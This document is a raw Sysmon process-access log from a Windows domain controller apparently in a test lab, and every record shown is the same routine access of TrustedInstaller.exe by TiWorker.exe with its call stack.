13:58:30.664{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.664{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.648{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.648{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.648{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.648{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.648{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.633{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.633{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.601{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.601{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.586{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT